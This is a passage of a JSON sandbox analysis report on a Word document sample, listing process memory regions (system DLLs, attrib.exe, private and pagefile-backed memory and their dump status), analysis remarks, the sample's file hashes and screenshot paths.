"00:08:11.764", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 4096, "start_va": 262144, "type": "region", "version": 1 }, "end_va": 266239, "entry_point": 262144, "filename": "\\Windows\\System32\\apisetschema.dll", "id": "region_1471", "name": "apisetschema.dll", "norm_filename": "c:\\windows\\system32\\apisetschema.dll", "region_type": "memory_mapped_file", "start_va": 262144, "timestamp": "00:08:11.765", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 16384, "start_va": 327680, "type": "region", "version": 1 }, "end_va": 344063, "entry_point": 0, "filename": null, "id": "region_1472", "name": "pagefile_0x0000000000050000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 327680, "timestamp": "00:08:11.768", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 4096, "start_va": 393216, "type": "region", "version": 1 }, "end_va": 397311, "entry_point": 0, "filename": null, "id": "region_1473", "name": "pagefile_0x0000000000060000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 393216, "timestamp": "00:08:11.768", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000010-region_00001474-addr_0x0000000000170000-size_0x0000000000040000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_849", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 262144, "start_va": 1507328, "type": "region", "version": 1 }, "end_va": 1769471, "entry_point": 0, "filename": null, "id": "region_1474", "name": "private_0x0000000000170000", "norm_filename": null, "region_type": "private_memory", "start_va": 1507328, "timestamp": "00:08:11.768", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 28672, "start_va": 2097152, "type": "region", "version": 1 }, "end_va": 2125823, "entry_point": 2097152, "filename": "\\Windows\\SysWOW64\\attrib.exe", "id": "region_1475", "name": "attrib.exe", "norm_filename": "c:\\windows\\syswow64\\attrib.exe", "region_type": "memory_mapped_file", "start_va": 2097152, "timestamp": "00:08:11.770", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000010-region_00001476-addr_0x0000000000280000-size_0x0000000000040000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_850", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 262144, "start_va": 2621440, "type": "region", "version": 1 }, "end_va": 2883583, "entry_point": 0, "filename": null, "id": "region_1476", "name": "private_0x0000000000280000", "norm_filename": null, "region_type": "private_memory", "start_va": 2621440, "timestamp": "00:08:11.776", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1740800, "start_va": 1996357632, "type": "region", "version": 1 }, "end_va": 1998098431, "entry_point": 1996357632, "filename": "\\Windows\\System32\\ntdll.dll", "id": "region_1477", "name": "ntdll.dll", "norm_filename": "c:\\windows\\system32\\ntdll.dll", "region_type": "memory_mapped_file", "start_va": 1996357632, "timestamp": "00:08:11.777", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1572864, "start_va": 1998323712, "type": "region", "version": 1 }, "end_va": 1999896575, "entry_point": 1998323712, "filename": "\\Windows\\SysWOW64\\ntdll.dll", "id": "region_1478", "name": "ntdll.dll", "norm_filename": "c:\\windows\\syswow64\\ntdll.dll", "region_type": "memory_mapped_file", "start_va": 1998323712, "timestamp": "00:08:11.779", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 143360, "start_va": 2130378752, "type": "region", "version": 1 }, "end_va": 2130522111, "entry_point": 0, "filename": null, "id": "region_1479", "name": "pagefile_0x000000007efb0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 2130378752, "timestamp": "00:08:11.780", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000010-region_00001480-addr_0x000000007efdb000-size_0x0000000000003000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_851", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 12288, "start_va": 2130554880, "type": "region", "version": 1 }, "end_va": 2130567167, "entry_point": 0, "filename": null, "id": "region_1480", "name": "private_0x000000007efdb000", "norm_filename": null, "region_type": "private_memory", "start_va": 2130554880, "timestamp": "00:08:11.780", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000010-region_00001481-addr_0x000000007efde000-size_0x0000000000001000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_852", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 4096, "start_va": 2130567168, "type": "region", "version": 1 }, "end_va": 2130571263, "entry_point": 0, "filename": null, "id": "region_1481", "name": "private_0x000000007efde000", "norm_filename": null, "region_type": "private_memory", "start_va": 2130567168, "timestamp": "00:08:11.780", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000010-region_00001482-addr_0x000000007efdf000-size_0x0000000000001000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_853", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 4096, "start_va": 2130571264, "type": "region", "version": 1 }, "end_va": 2130575359, "entry_point": 0, "filename": null, "id": "region_1482", "name": "private_0x000000007efdf000", "norm_filename": null, "region_type": "private_memory", "start_va": 2130571264, "timestamp": "00:08:11.781", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "region_too_big" ], "info": "No dump was created because region size surpasses maximum region dump size of the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 16777216, "start_va": 2130575360, "type": "region", "version": 1 }, "end_va": 2147352575, "entry_point": 0, "filename": null, "id": "region_1483", "name": "private_0x000000007efe0000", "norm_filename": null, "region_type": "private_memory", "start_va": 2130575360, "timestamp": "00:08:11.781", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000010-region_00001484-addr_0x000000007ffe0000-size_0x0000000000010000-perm_r.bin", "flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ "readable" ], "ref_process_dump": { "ref_id": "proc_dump_854", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 65536, "start_va": 2147352576, "type": "region", "version": 1 }, "end_va": 2147418111, "entry_point": 0, "filename": null, "id": "region_1484", "name": "private_0x000000007ffe0000", "norm_filename": null, "region_type": "private_memory", "start_va": 2147352576, "timestamp": "00:08:11.781", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "ignored_region" ], "info": "No dump was created because this is an ignored region", "permissions": [ "readable" ], "ref_process_dump": null, "size": 8793945538560, "start_va": 2147418112, "type": "region", "version": 1 }, "end_va": 8796092956671, "entry_point": 0, "filename": null, "id": "region_1485", "name": "private_0x000000007fff0000", "norm_filename": null, "region_type": "private_memory", "start_va": 2147418112, "timestamp": "00:08:11.781", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000010-region_00001486-addr_0x0000000000490000-size_0x0000000000080000-perm_rw.bin", "flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_855", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 524288, "start_va": 4784128, "type": "region", "version": 1 }, "end_va": 5308415, "entry_point": 0, "filename": null, "id": "region_1486", "name": "private_0x0000000000490000", "norm_filename": null, "region_type": "private_memory", "start_va": 4784128, "timestamp": "00:08:11.785", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 376832, "start_va": 1936785408, "type": "region", "version": 1 }, "end_va": 1937162239, "entry_point": 1937045400, "filename": "\\Windows\\System32\\wow64win.dll", "id": "region_1487", "name": "wow64win.dll", "norm_filename": "c:\\windows\\system32\\wow64win.dll", "region_type": "memory_mapped_file", "start_va": 1936785408, "timestamp": "00:08:11.786", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 258048, "start_va": 1937178624, "type": "region", "version": 1 }, "end_va": 1937436671, "entry_point": 1937366648, "filename": "\\Windows\\System32\\wow64.dll", "id": "region_1488", "name": "wow64.dll", "norm_filename": "c:\\windows\\system32\\wow64.dll", "region_type": "memory_mapped_file", "start_va": 1937178624, "timestamp": "00:08:11.788", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 32768, "start_va": 1937506304, "type": "region", "version": 1 }, "end_va": 1937539071, "entry_point": 1937514744, "filename": "\\Windows\\System32\\wow64cpu.dll", "id": "region_1489", "name": "wow64cpu.dll", "norm_filename": "c:\\windows\\system32\\wow64cpu.dll", "region_type": "memory_mapped_file", "start_va": 1937506304, "timestamp": "00:08:11.790", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 65536, "start_va": 65536, "type": "region", "version": 1 }, "end_va": 131071, "entry_point": 0, "filename": null, "id": "region_1490", "name": "pagefile_0x0000000000010000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 65536, "timestamp": "00:08:11.824", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 65536, "start_va": 131072, "type": "region", "version": 1 }, "end_va": 196607, "entry_point": 0, "filename": null, "id": "region_1491", "name": "pagefile_0x0000000000020000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 131072, "timestamp": "00:08:11.824", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 421888, "start_va": 458752, "type": "region", "version": 1 }, "end_va": 880639, "entry_point": 458752, "filename": "\\Windows\\System32\\locale.nls", "id": "region_1492", "name": "locale.nls", "norm_filename": "c:\\windows\\system32\\locale.nls", "region_type": "memory_mapped_file", "start_va": 458752, "timestamp": "00:08:11.825", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000010-region_00001493-addr_0x0000000000400000-size_0x0000000000010000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_856", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 65536, "start_va": 4194304, "type": "region", "version": 1 }, "end_va": 4259839, "entry_point": 0, "filename": null, "id": "region_1493", "name": "private_0x0000000000400000", "norm_filename": null, "region_type": "private_memory", "start_va": 4194304, "timestamp": "00:08:11.826", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000010-region_00001494-addr_0x00000000006e0000-size_0x0000000000100000-perm_rw.bin", "flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_857", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 1048576, "start_va": 7208960, "type": "region", "version": 1 }, "end_va": 8257535, "entry_point": 0, "filename": null, "id": "region_1494", "name": "private_0x00000000006e0000", "norm_filename": null, "region_type": "private_memory", "start_va": 7208960, "timestamp": "00:08:11.826", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 118784, "start_va": 1958608896, "type": "region", "version": 1 }, "end_va": 1958727679, "entry_point": 1958608896, "filename": "\\Windows\\SysWOW64\\ulib.dll", "id": "region_1495", "name": "ulib.dll", "norm_filename": "c:\\windows\\syswow64\\ulib.dll", "region_type": "memory_mapped_file", "start_va": 1958608896, "timestamp": "00:08:11.827", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 49152, "start_va": 1959854080, "type": "region", "version": 1 }, "end_va": 1959903231, "entry_point": 1959858401, "filename": "\\Windows\\SysWOW64\\cryptbase.dll", "id": "region_1496", "name": "cryptbase.dll", "norm_filename": "c:\\windows\\syswow64\\cryptbase.dll", "region_type": "memory_mapped_file", "start_va": 1959854080, "timestamp": "00:08:11.839", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 393216, "start_va": 1959919616, "type": "region", "version": 1 }, "end_va": 1960312831, "entry_point": 1960027059, "filename": "\\Windows\\SysWOW64\\sspicli.dll", "id": "region_1497", "name": "sspicli.dll", "norm_filename": "c:\\windows\\syswow64\\sspicli.dll", "region_type": "memory_mapped_file", "start_va": 1959919616, "timestamp": "00:08:11.840", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1114112, "start_va": 1964244992, "type": "region", "version": 1 }, "end_va": 1965359103, "entry_point": 1964323539, "filename": "\\Windows\\SysWOW64\\kernel32.dll", "id": "region_1498", "name": "kernel32.dll", "norm_filename": "c:\\windows\\syswow64\\kernel32.dll", "region_type": "memory_mapped_file", "start_va": 1964244992, "timestamp": "00:08:11.842", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1048576, "start_va": 1965359104, "type": "region", "version": 1 }, "end_va": 1966407679, "entry_point": 1965471469, "filename": "\\Windows\\SysWOW64\\user32.dll", "id": "region_1499", "name": "user32.dll", "norm_filename": "c:\\windows\\syswow64\\user32.dll", "region_type": "memory_mapped_file", "start_va": 1965359104, "timestamp": "00:08:11.844", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 655360, "start_va": 1966800896, "type": "region", "version": 1 }, "end_va": 1967456255, "entry_point": 1966885349, "filename": "\\Windows\\SysWOW64\\advapi32.dll", "id": "region_1500", "name": "advapi32.dll", "norm_filename": "c:\\windows\\syswow64\\advapi32.dll", "region_type": "memory_mapped_file", "start_va": 1966800896, "timestamp": "00:08:11.845", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 643072, "start_va": 1967456256, "type": "region", "version": 1 }, "end_va": 1968099327, "entry_point": 1967669207, "filename": "\\Windows\\SysWOW64\\usp10.dll", "id": "region_1501", "name": "usp10.dll", "norm_filename": "c:\\windows\\syswow64\\usp10.dll", "region_type": "memory_mapped_file", "start_va": 1967456256, "timestamp": "00:08:11.847", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 40960, "start_va": 1968111616, "type": "region", "version": 1 }, "end_va": 1968152575, "entry_point": 1968125600, "filename": "\\Windows\\SysWOW64\\lpk.dll", "id": "region_1502", "name": "lpk.dll", "norm_filename": "c:\\windows\\syswow64\\lpk.dll", "region_type": "memory_mapped_file", "start_va": 1968111616, "timestamp": "00:08:11.848", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 704512, "start_va": 1968177152, "type": "region", "version": 1 }, "end_va": 1968881663, "entry_point": 1968219250, "filename": "\\Windows\\SysWOW64\\msvcrt.dll", "id": "region_1503", "name": "msvcrt.dll", "norm_filename": "c:\\windows\\syswow64\\msvcrt.dll", "region_type": "memory_mapped_file", "start_va": 1968177152, "timestamp": "00:08:11.850", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 983040, "start_va": 1971257344, "type": "region", "version": 1 }, "end_va": 1972240383, "entry_point": 1971324265, "filename": "\\Windows\\SysWOW64\\rpcrt4.dll", "id": "region_1504", "name": "rpcrt4.dll", "norm_filename": "c:\\windows\\syswow64\\rpcrt4.dll", "region_type": "memory_mapped_file", "start_va": 1971257344, "timestamp": "00:08:11.852", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 102400, "start_va": 1972240384, "type": "region", "version": 1 }, "end_va": 1972342783, "entry_point": 1972259189, "filename": "\\Windows\\SysWOW64\\sechost.dll", "id": "region_1505", "name": "sechost.dll", "norm_filename": "c:\\windows\\syswow64\\sechost.dll", "region_type": "memory_mapped_file", "start_va": 1972240384, "timestamp": "00:08:11.853", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 286720, "start_va": 1972371456, "type": "region", "version": 1 }, "end_va": 1972658175, "entry_point": 1972401272, "filename": "\\Windows\\SysWOW64\\KernelBase.dll", "id": "region_1506", "name": "kernelbase.dll", "norm_filename": "c:\\windows\\syswow64\\kernelbase.dll", "region_type": "memory_mapped_file", "start_va": 1972371456, "timestamp": "00:08:11.855", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 589824, "start_va": 1974140928, "type": "region", "version": 1 }, "end_va": 1974730751, "entry_point": 1974231875, "filename": "\\Windows\\SysWOW64\\gdi32.dll", "id": "region_1507", "name": "gdi32.dll", "norm_filename": "c:\\windows\\syswow64\\gdi32.dll", "region_type": "memory_mapped_file", "start_va": 1974140928, "timestamp": "00:08:11.857", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1024000, "start_va": 1994129408, "type": "region", "version": 1 }, "end_va": 1995153407, "entry_point": 0, "filename": null, "id": "region_1508", "name": "private_0x0000000076dc0000", "norm_filename": null, "region_type": "private_memory", "start_va": 1994129408, "timestamp": "00:08:11.858", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1175552, "start_va": 1995177984, "type": "region", "version": 1 }, "end_va": 1996353535, "entry_point": 0, "filename": null, "id": "region_1509", "name": "private_0x0000000076ec0000", "norm_filename": null, "region_type": "private_memory", "start_va": 1995177984, "timestamp": "00:08:11.858", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 1048576, "start_va": 2130575360, "type": "region", "version": 1 }, "end_va": 2131623935, "entry_point": 0, "filename": null, "id": "region_1510", "name": "pagefile_0x000000007efe0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 2130575360, "timestamp": "00:08:11.858", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "region_too_big" ], "info": "No dump was created because region size surpasses maximum region dump size of the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 15728640, "start_va": 2131623936, "type": "region", "version": 1 }, "end_va": 2147352575, "entry_point": 0, "filename": null, "id": "region_1511", "name": "private_0x000000007f0e0000", "norm_filename": null, "region_type": "private_memory", "start_va": 2131623936, "timestamp": "00:08:11.858", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 1605632, "start_va": 5308416, "type": "region", "version": 1 }, "end_va": 6914047, "entry_point": 0, "filename": null, "id": "region_1512", "name": "pagefile_0x0000000000510000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 5308416, "timestamp": "00:08:11.862", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 393216, "start_va": 1966407680, "type": "region", "version": 1 }, "end_va": 1966800895, "entry_point": 1966478735, "filename": "\\Windows\\SysWOW64\\imm32.dll", "id": "region_1513", "name": "imm32.dll", "norm_filename": "c:\\windows\\syswow64\\imm32.dll", "region_type": "memory_mapped_file", "start_va": 1966407680, "timestamp": "00:08:11.863", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 835584, "start_va": 1970339840, "type": "region", "version": 1 }, "end_va": 1971175423, "entry_point": 1970345611, "filename": "\\Windows\\SysWOW64\\msctf.dll", "id": "region_1514", "name": "msctf.dll", "norm_filename": "c:\\windows\\syswow64\\msctf.dll", "region_type": "memory_mapped_file", "start_va": 1970339840, "timestamp": "00:08:11.865", "type": "region", "version": 1 } ], "terminate_reason": "terminated", "type": "monitored_process", "unmonitor_reason": "terminated_by_timeout", "version": 1 } ], "remarks": { "critical": [], "non_critical": [ { "comment": "The operating system was rebooted during the analysis.", "id": 128, "type": "remark", "version": 1 }, { "comment": "The maximum number of extracted files was reached during the analysis. Some files may be missing in the reports. You can increase the limit in the configuration.", "id": 1024, "type": "remark", "version": 1 }, { "comment": "The dump total size limit was reached during the analysis. Some memory dump may be missing in the reports. You can increase the limit in the configuration.", "id": 512, "type": "remark", "version": 1 } ], "type": "remarks", "version": 1 }, "sample_details": { "filename": "69234490.doc", "id": 17650, "md5_hash": "5975014ccde7296da4989a01e1471e92", "sample_type": "word_document", "sha1_hash": "499a74573cf6aaa8e79c05d1b6d59dbbfb7402e1", "sha256_hash": "fec85bce338245403956637218c76db743748306c89f7ee7830af65ad17f62db", "size": 75837, "type": "sample_details", "version": 1 }, "screenshots": [ { "screenshot_archive_path": "screenshots/screenshot_0.png", "size": 70847, "thumbnail_archive_path": "screenshots/thumbnail_0.png", "timestamp": "00:00:00.000", "type": "screenshot", "version": 1 }, { "screenshot_archive_path": "screenshots/screenshot_16263.png", "size": 131873, "thumbnail_archive_path": "screenshots/thumbnail_16263.png", "timestamp": "00:00:16.263", "type": "screenshot", "version": 1 }, { "screenshot_archive_path": "screenshots/screenshot_23583.png", "size": 135744, "thumbnail_archive_path": "screenshots/thumbnail_23583.png", "timestamp": "00:00:23.583", "type": "screenshot", "version": 1 }, { "screenshot_archive_path": "screenshots/screenshot_24584.png", "size": 141821, "thumbnail_archive_path": "screenshots/thumbnail_24584.png", "timestamp": "00:00:24.584", "type": "screenshot", "version": 1 }, { "screenshot_archive_path": "screenshots/screenshot_26625.png", "size": 141786, "thumbnail_archive_path": "screenshots/thumbnail_26625.png", "timestamp": "00:00:26.625", "type": "screenshot", "version": 1 }, { "screenshot_archive_path": "screenshots/screenshot_27637.png", "size": 130429, "thumbnail_archive_path": "screenshots/thumbnail_27637.png", "timestamp": "00:00:27.637", "type": "screenshot", "version": 1 }, { "screenshot_archive_path": "screenshots/screenshot_40041.png", "size": 132346, "thumbnail_archive_path": "screenshots/thumbnail_40041.png", "timestamp": "00:00:40.041", "type": "screenshot", "version": 1 }, { "screenshot_archive_path": "screenshots/screenshot_42082.png", "size": 131810, "thumbnail_archive_path": "screenshots/thumbnail_42082.png", "timestamp": "00:00:42.082", "type": "screenshot", "version": 1 }, { "screenshot_archive_path": "screenshots/screenshot_45156.png", "size": 131576, "thumbnail_archive_path": "screenshots/thumbnail_45156.png", "timestamp": "00:00:45.156", "type": "screenshot", "version": 1 }, { "screenshot_archive_path": "screenshots/screenshot_58414.png", "size": 151494, "thumbnail_archive_path": "screenshots/thumbnail_58414.png", "timestamp": "00:00:58.414", "type": "screenshot", "version": 1 }, { "screenshot_archive_path": "screenshots/screenshot_60461.png", "size": 130721, "thumbnail_archive_path": "screenshots/thumbnail_60461.png", "timestamp": "00:01:00.461", "type": "screenshot", "version": 1 }, { "screenshot_archive_path": "screenshots/screenshot_69634.png", "size": 150799, "thumbnail_archive_path": "screenshots/thumbnail_69634.png", "timestamp": "00:01:09.634", "type": "screenshot", "version": 1 }, { "screenshot_archive_path": "screenshots/screenshot_72676.png", "size": 130398, "thumbnail_archive_path": "screenshots/thumbnail_72676.png", "timestamp": "00:01:12.676", "type": "screenshot", "version": 1 }, { "screenshot_archive_path": "screenshots/screenshot_81854.png", "size": 151787, "thumbnail_archive_path": "screenshots/thumbnail_81854.png", "timestamp": "00:01:21.854", "type": "screenshot", "version": 1 }, { "screenshot_archive_path": "screenshots/screenshot_85966.png", "size": 130468, "thumbnail_archive_path": "screenshots/thumbnail_85966.png", "timestamp": "00:01:25.966", "type": "screenshot", "version": 1 }, { "screenshot_archive_path": "screenshots/screenshot_100236.png", "size": 130937, "thumbnail_archive_path": "screenshots/thumbnail_100236.png", "timestamp": "00:01:40.236", "type": "screenshot", "version": 1 }, { "screenshot_archive_path": "screenshots/screenshot_101235.png", "size": 126381, "thumbnail_archive_path": "screenshots/thumbnail_101235.png", "timestamp": "00:01:41.235", "type": "screenshot", "version": 1 }, { "screenshot_archive_path": "screenshots/screenshot_102235.png", "size": 940529, "thumbnail_archive_path": "screenshots/thumbnail_102235.png", "timestamp": "00:01:42.235", "type": "screenshot", "version": 1 }, { "screenshot_archive_path": "screenshots/screenshot_160745.png", "size": 973852, "thumbnail_archive_path": "screenshots/thumbnail_160745.png", "timestamp": "00:02:40.745", "type": "screenshot", "version": 1 }, { "screenshot_archive_path": "screenshots/screenshot_176827.png", "size": 933128, "thumbnail_archive_path": "screenshots/thumbnail_176827.png", "timestamp": "00:02:56.827", "type": "screenshot", "version": 1 }, { "screenshot_archive_path": "screenshots/screenshot_178830.png", "size": 489094, "thumbnail_archive_path": "screenshots/thumbnail_178830.png", "timestamp": "00:02:58.830", "type": "screenshot", "version": 1 }, { "screenshot_archive_path": "screenshots/screenshot_201840.png", "size": 4187, "thumbnail_archive_path": "screenshots/thumbnail_201840.png", "timestamp": "00:03:21.840", "type": "screenshot", "version": 1 }, { "screenshot_archive_path": "screenshots/screenshot_202943.png", "size": 488648, "thumbnail_archive_path": "screenshots/thumbnail_202943.png", "timestamp": "00:03:22.943", "type": "screenshot", "version": 1 }, { "screenshot_archive_path": "screenshots/screenshot_209960.png", "size": 963523, "thumbnail_archive_path": "screenshots/thumbnail_209960.png", "timestamp": "00:03:29.960", "type": "screenshot", "version": 1 }, { "screenshot_archive_path": "screenshots/screenshot_494813.png", "size": 974710, "thumbnail_archive_path": "screenshots/thumbnail_494813.png", "timestamp": "00:08:14.813", "type": "screenshot", "version": 1 }, { "screenshot_archive_path": "screenshots/screenshot_496812.png", "size": 970897, "thumbnail_archive_path": "screenshots/thumbnail_496812.png", "timestamp": "00:08:16.812", "type": "screenshot", "version": 1 }, { "screenshot_archive_path": "screenshots/screenshot_504001.png", "size": 971598, "thumbnail_archive_path": "screenshots/thumbnail_504001.png", "timestamp": "00:08:24.001", "type": "screenshot", "version": 1 }, { "screenshot_archive_path": "screenshots/screenshot_505017.png", "size": 975948, "thumbnail_archive_path": "screenshots/thumbnail_505017.png", "timestamp": "00:08:25.017", "type": "screenshot", "version": 1 }, { "screenshot_archive_path": "screenshots/screenshot_506029.png", "size": 977402, "thumbnail_archive_path": "screenshots/thumbnail_506029.png", "timestamp": "00:08:26.029", "type": "screenshot", "version": 1 }, { "screenshot_archive_path": "screenshots/screenshot_507043.png", "size": 977826, "thumbnail_archive_path": "screenshots/thumbnail_507043.png", "timestamp": "00:08:27.043", "type": "screenshot", "version": 1 } ], "type": "summary", "version": 1, "vm_and_analyzer_details": { "adobe_acrobat_reader_version": "not_installed", "analyzer_build_date": "2017-08-21 12:23", 